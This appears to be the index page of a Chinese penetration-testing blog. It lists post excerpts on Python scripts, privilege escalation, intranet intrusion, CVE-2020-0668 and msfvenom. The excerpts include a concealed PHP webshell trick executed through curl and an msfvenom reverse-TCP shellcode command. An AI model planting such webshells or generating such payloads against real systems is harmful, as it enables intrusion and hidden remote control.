BugMan

所有的胜利,与征服自己的胜利比起来,都是微不足道;所有的失败,与失去自己的失败比起来,更是微不足道.

Python-json处理

处理json数据

首先放一段代码 import requestsimport jsonpathimport jsonf=open('ip.txt','r',encoding='utf-8')for my_ip in f.readlines(): my_ip=str(my_ip[:-1]) respons=requests.get('http://ip-api.com/json/{ip}?lang...

Posted by BugMan on April 26, 2020

Python笔记

Learn

两个for 循环同时输出+正则文章 zip(list1,list2) zip函数同时便利两个列表 import sysimport requestsimport refrom bs4 import BeautifulSouphot="https://wiki.17-apt.tk"a=requests.get(hot).contentb=BeautifulSoup(a)#d=print...

Posted by BugMan on April 26, 2020

隐藏Webshell

骚思路

隐藏Webshell $ sudo echo -e "<?=\`\$_POST[1]\`?>\r<?='PHP Test';?>" > test.php $ cat test.php <?='PHP Test';?> $ curl localhost/test.php -d 1=id uid=33(www-data) gid=33(www-data...

Posted by BugMan on April 26, 2019

内网资料

内网资料备份

内网资料备份 获取 webshell 进内网 测试主站,搜 wooyun 历史洞未发现历史洞,github, svn, 目录扫描未发现敏感信息, 无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用 ocr 识别,找账号,通过 google,baidu,bing 等搜索,相关邮箱,域名等加常用密码组成字典,发现用户手册,找账号,发现未打码信息,和默认密码,试下...

Posted by BugMan on April 26, 2019

提权技巧

各种提权备忘

这里是Linux环境中特权升级的最常用技术: 内核 突破 以root身份运行的程序 安装的软件 弱密码 /重用密码 /纯文本密码 内部服务 Suid 配置错误 滥用sudo权利 由root调用的世界可写脚本 路径配置...

Posted by BugMan on April 26, 2019

CVE-2020-0668

CVE-2020-0668-Windows服务跟踪中的普通特权升级错误

CVE-2020-0668-Windows服务跟踪中的普通特权升级错误 在本文中,我将讨论在Windows Service Tracing中发现的任意文件移动漏洞。从我的测试来看,它影响了从Vista到10的所有Windows版本,但它可能更旧,因为XP中已经存在此功能。 服务跟踪是一项旧功能,我可以追溯到Windows XP,但它可能已存在于以前的OS版本中。它旨在提供有关正在运...

Posted by BugMan on April 26, 2019

Axer-使用Msfvenom创建的工具

Axer-使用Msfvenom自动创建有效负载的过程的工具

Axer-使用Msfvenom自动创建有效负载的过程的工具 该axer将替换创建有效载荷的手动过程msfvenom,使其更容易和快了很多。 AXER可以让您选择平台,格式,编码器,与另一个文件绑定以及许多其他功能: 下载The-Axer https://github.com/ceh-tn/The-Axer

Posted by BugMan on April 26, 2019

MSFVENOM SHELLCODE生成

MSFVENOM 生成 SHELLCODE

MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Windows反向TCP Shell(Shellcode x86) 如果有效负载大小没有问题...

Posted by BugMan on April 26, 2019

FEATURED TAGS
msf 渗透测试 CVE POC 提权 内网 Webshell PHP Python 代码 编程 EXP 漏洞复现 中间件 反弹Shell Tools 工具 office XSS google Shell 后门 Flash 钓鱼
ABOUT ME

要努力使每一天都开心而有意义,Hard!!!

✉️ shell@outlook.sk

FRIENDS